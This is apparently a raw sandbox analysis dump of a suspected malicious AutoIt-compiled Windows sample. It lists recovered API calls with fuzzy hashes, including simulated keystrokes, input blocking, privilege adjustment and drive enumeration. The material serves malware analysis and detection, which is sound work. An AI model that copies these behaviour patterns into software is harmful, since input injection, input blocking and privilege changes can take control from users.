                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 3479602957-0
                                                                                                      • Opcode ID: 1e45bb72cabc6abffd1b79442797c2589e0f042cd6233c340841f57a7c4f442d
                                                                                                      • Instruction ID: ddd93ecc04c8b87499004e885fe730b46a72f586ce83c57aeb88760e6abc752f
                                                                                                      • Opcode Fuzzy Hash: 1e45bb72cabc6abffd1b79442797c2589e0f042cd6233c340841f57a7c4f442d
                                                                                                      • Instruction Fuzzy Hash: 3EF0E5342003257AEB2027659C4DFEF766FEFC5762F000165B509D3295D9609944C7B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00D7BB39
                                                                                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00D7BB4C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InputSendkeybd_event
                                                                                                      • String ID:
                                                                                                      • API String ID: 3536248340-0
                                                                                                      • Opcode ID: 5db149e7983b9a5f0e4fc071a83a5bfc26be28820807bd6c0e3d947cee271ba4
                                                                                                      • Instruction ID: a1f4b7a1407371f20192c085d9d7ef316d8da1f299419d811c44c0131a08e31b
                                                                                                      • Opcode Fuzzy Hash: 5db149e7983b9a5f0e4fc071a83a5bfc26be28820807bd6c0e3d947cee271ba4
                                                                                                      • Instruction Fuzzy Hash: DDF06D7080024DABDB058FA0C806BBEBFB0FF08319F04800AF956E6191D3798601DFA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D71A8C), ref: 00D71964
                                                                                                      • CloseHandle.KERNEL32(?,?,00D71A8C), ref: 00D71979
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 81990902-0
                                                                                                      • Opcode ID: 881bf4dd54ba9a73d732a6554b539bf2e6d4921b5e6b133adb91b54a295e7535
                                                                                                      • Instruction ID: 4c4e3486251e46a9bd35698df15f763120c2286358da48b859343dfc73b4d37a
                                                                                                      • Opcode Fuzzy Hash: 881bf4dd54ba9a73d732a6554b539bf2e6d4921b5e6b133adb91b54a295e7535
                                                                                                      • Instruction Fuzzy Hash: 20E09A72014710AEF7252B14EC05E777BA9EF05310F14891DB5AAC49B0DB626C919B64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • BlockInput.USER32(00000001), ref: 00D8F41A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BlockInput
                                                                                                      • String ID:
                                                                                                      • API String ID: 3456056419-0
                                                                                                      • Opcode ID: 007d96cb8c5a0ae386675708a5ab42b505f696330045f559d1035f24d20eaadd
                                                                                                      • Instruction ID: e3011f8b8d8f5a8db91d3bcdfef3842c180d5c8535d3fedcd56bf49bed4e38d4
                                                                                                      • Opcode Fuzzy Hash: 007d96cb8c5a0ae386675708a5ab42b505f696330045f559d1035f24d20eaadd
                                                                                                      • Instruction Fuzzy Hash: D8E048312002046FD710AF59E404A97B7D8EF64761F048426FD4AC7351DA70E881CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnumSystemLocalesEx.KERNEL32(00000000,00000000,00000000,00000000,?,100158F5,10015993,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 10011691
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099609381-0
                                                                                                      • Opcode ID: 1ad3b1db0bb4737aa9636f9716781f5b79997e0e83acdae654dae1999c47b466
                                                                                                      • Instruction ID: 78931ed0ac63f25f365028e41612fca75a265e8b02a3f6201816ab0ddb2e4b74
                                                                                                      • Opcode Fuzzy Hash: 1ad3b1db0bb4737aa9636f9716781f5b79997e0e83acdae654dae1999c47b466
                                                                                                      • Instruction Fuzzy Hash: 15C0483204020CBBDF022F81DC09B993FAAFB08660F448010FA1808070D772A520AB84
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLocaleInfoEx.KERNEL32(?,20001004,?,1000F9EB,?,1000F9EB,?,20001004,?,00000002,?,00000004,?,00000000), ref: 100116A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 9915baaca9989b8985f87094bd48d380a4d92a329c61046ca4a59e7a3bbb6966
                                                                                                      • Instruction ID: cfd699d0f00e3b9ada7fa3dc8eccd8e8cc330884bb70cedc9d77db1b3ca1ef0b
                                                                                                      • Opcode Fuzzy Hash: 9915baaca9989b8985f87094bd48d380a4d92a329c61046ca4a59e7a3bbb6966
                                                                                                      • Instruction Fuzzy Hash: A4C0013200024DBBCF025F81EC0489A3F2AEB08261B008010FA2804420C7329A70AB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00D9348D
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00D934A0
                                                                                                      • DestroyWindow.USER32 ref: 00D934AF
                                                                                                      • GetDesktopWindow.USER32 ref: 00D934CA
                                                                                                      • GetWindowRect.USER32(00000000), ref: 00D934D1
                                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00D93600
                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00D9360E
                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D93655
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00D93661
                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D9369D
                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D936BF
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D936D2
                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D936DD
                                                                                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D936E6
                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D936F5
                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D936FE
                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D93705
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00D93710
                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D93722
                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DB0C04,00000000), ref: 00D93738
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00D93748
                                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00D9376E
                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00D9378D
                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D937AF
                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9399C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                      • Opcode ID: 1bc6fb13eb19b99150ed5629f69595a6c0989120f18669f373e3a7fda45110a7
                                                                                                      • Instruction ID: e486fc944bf0c23e1b4eeca66f4abd50501ae2922b4d9a73cc95653a20cf91a2
                                                                                                      • Opcode Fuzzy Hash: 1bc6fb13eb19b99150ed5629f69595a6c0989120f18669f373e3a7fda45110a7
                                                                                                      • Instruction Fuzzy Hash: 14024B71900205AFDB14DFA4DD89EAE7BBAEB49310F148158F916EB2A0DB74AD41CF70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00DA7A8E
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00DA7ABF
                                                                                                      • GetSysColor.USER32(0000000F), ref: 00DA7ACB
                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00DA7AE5
                                                                                                      • SelectObject.GDI32(?,?), ref: 00DA7AF4
                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00DA7B1F
                                                                                                      • GetSysColor.USER32(00000010), ref: 00DA7B27
                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00DA7B2E
                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00DA7B3D
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00DA7B44
                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00DA7B8F
                                                                                                      • FillRect.USER32(?,?,?), ref: 00DA7BC1
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA7BE3
                                                                                                        • Part of subcall function 00DA7D47: GetSysColor.USER32(00000012), ref: 00DA7D80
                                                                                                        • Part of subcall function 00DA7D47: SetTextColor.GDI32(?,00DA7A54), ref: 00DA7D84
                                                                                                        • Part of subcall function 00DA7D47: GetSysColorBrush.USER32(0000000F), ref: 00DA7D9A
                                                                                                        • Part of subcall function 00DA7D47: GetSysColor.USER32(0000000F), ref: 00DA7DA5
                                                                                                        • Part of subcall function 00DA7D47: GetSysColor.USER32(00000011), ref: 00DA7DC2
                                                                                                        • Part of subcall function 00DA7D47: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DA7DD0
                                                                                                        • Part of subcall function 00DA7D47: SelectObject.GDI32(?,00000000), ref: 00DA7DE1
                                                                                                        • Part of subcall function 00DA7D47: SetBkColor.GDI32(?,?), ref: 00DA7DEA
                                                                                                        • Part of subcall function 00DA7D47: SelectObject.GDI32(?,?), ref: 00DA7DF7
                                                                                                        • Part of subcall function 00DA7D47: InflateRect.USER32(?,000000FF,000000FF), ref: 00DA7E16
                                                                                                        • Part of subcall function 00DA7D47: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DA7E2D
                                                                                                        • Part of subcall function 00DA7D47: GetWindowLongW.USER32(?,000000F0), ref: 00DA7E3A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                      • String ID:
                                                                                                      • API String ID: 4124339563-0
                                                                                                      • Opcode ID: 7abbfbda6d7516285708044eba4c01383bf3f5afb18d9a9fbbb9e30a3c4fee04
                                                                                                      • Instruction ID: 24345ada03071821218f84167ba0456e496cfefd22373b9d13154ebacd05de06
                                                                                                      • Opcode Fuzzy Hash: 7abbfbda6d7516285708044eba4c01383bf3f5afb18d9a9fbbb9e30a3c4fee04
                                                                                                      • Instruction Fuzzy Hash: B6A18E72408301BFD7019F64DC48A6BBBAAFF4A321F140A19F5A2D62E0D775D9448BB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(?,?), ref: 00D116B4
                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D52B26
                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D52B5F
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D52FA4
                                                                                                        • Part of subcall function 00D11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D11488,?,00000000,?,?,?,?,00D1145A,00000000,?), ref: 00D11865
                                                                                                      • SendMessageW.USER32(?,00001053), ref: 00D52FE0
                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D52FF7
                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D5300D
                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D53018
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 2760611726-4108050209
                                                                                                      • Opcode ID: 1032b98ee2cf1de659b7f428ef5a963f026d8b7d59861479b2d0f9cede31da30
                                                                                                      • Instruction ID: ce63cae42ccdb9c2f8248540f0f0adcfa1d9540a9d9ca58cf7091a03ca84839a
                                                                                                      • Opcode Fuzzy Hash: 1032b98ee2cf1de659b7f428ef5a963f026d8b7d59861479b2d0f9cede31da30
                                                                                                      • Instruction Fuzzy Hash: 52129C34604201AFCB25DF14D884BB9B7F5FB46302F184569E995CB662CB31E98ACFB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(00000000), ref: 00D9309B
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D931C7
                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00D93206
                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00D93216
                                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00D9325D
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00D93269
                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00D932B2
                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D932C1
                                                                                                      • GetStockObject.GDI32(00000011), ref: 00D932D1
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00D932D5
                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00D932E5
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D932EE
                                                                                                      • DeleteDC.GDI32(00000000), ref: 00D932F7
                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D93323
                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00D9333A
                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00D9337A
                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D9338E
                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00D9339F
                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00D933D4
                                                                                                      • GetStockObject.GDI32(00000011), ref: 00D933DF
                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D933EA
                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00D933F4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                      • API String ID: 2910397461-517079104
                                                                                                      • Opcode ID: a729654995b99c418c247fc19ad08b1cfd12f24ec8ec07ea2ca9b983c0f6f4b5
                                                                                                      • Instruction ID: cfdc52e066caea61345bd1dc4d8af7010dbe033fc3d8196b9205a5ae3e903d75
                                                                                                      • Opcode Fuzzy Hash: a729654995b99c418c247fc19ad08b1cfd12f24ec8ec07ea2ca9b983c0f6f4b5
                                                                                                      • Instruction Fuzzy Hash: ACB12DB1A40315AFEB14DFA8DC85FAA7BA9EB45710F004115F915EB2A0DB74AD40CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00D85447
                                                                                                      • GetDriveTypeW.KERNEL32(?,00DADC30,?,\\.\,00DADCD0), ref: 00D85524
                                                                                                      • SetErrorMode.KERNEL32(00000000,00DADC30,?,\\.\,00DADCD0), ref: 00D85690
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                      • Opcode ID: 984a3480cf3b5efa74475b8921a0604514444e919ab3ba9224fef1cd8407c540
                                                                                                      • Instruction ID: 3dee5b47e6c6761c758f5f8d34db6ff91dd514ef28933613e6cf51e39c900590
                                                                                                      • Opcode Fuzzy Hash: 984a3480cf3b5efa74475b8921a0604514444e919ab3ba9224fef1cd8407c540
                                                                                                      • Instruction Fuzzy Hash: 9B61A330644A05EFCB14FF28EA42DBDB7A2EF44300B688496E446AB369E771DD45CB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetSysColor.USER32(00000012), ref: 00DA7D80
                                                                                                      • SetTextColor.GDI32(?,00DA7A54), ref: 00DA7D84
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00DA7D9A
                                                                                                      • GetSysColor.USER32(0000000F), ref: 00DA7DA5
                                                                                                      • CreateSolidBrush.GDI32(?), ref: 00DA7DAA
                                                                                                      • GetSysColor.USER32(00000011), ref: 00DA7DC2
                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DA7DD0
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00DA7DE1
                                                                                                      • SetBkColor.GDI32(?,?), ref: 00DA7DEA
                                                                                                      • SelectObject.GDI32(?,?), ref: 00DA7DF7
                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00DA7E16
                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DA7E2D
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA7E3A
                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DA7E89
                                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DA7EB3
                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00DA7ED1
                                                                                                      • DrawFocusRect.USER32(?,?), ref: 00DA7EDC
                                                                                                      • GetSysColor.USER32(00000011), ref: 00DA7EED
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00DA7EF5
                                                                                                      • DrawTextW.USER32(?,00DA7A54,000000FF,?,00000000), ref: 00DA7F07
                                                                                                      • SelectObject.GDI32(?,?), ref: 00DA7F1E
                                                                                                      • DeleteObject.GDI32(?), ref: 00DA7F29
                                                                                                      • SelectObject.GDI32(?,?), ref: 00DA7F2F
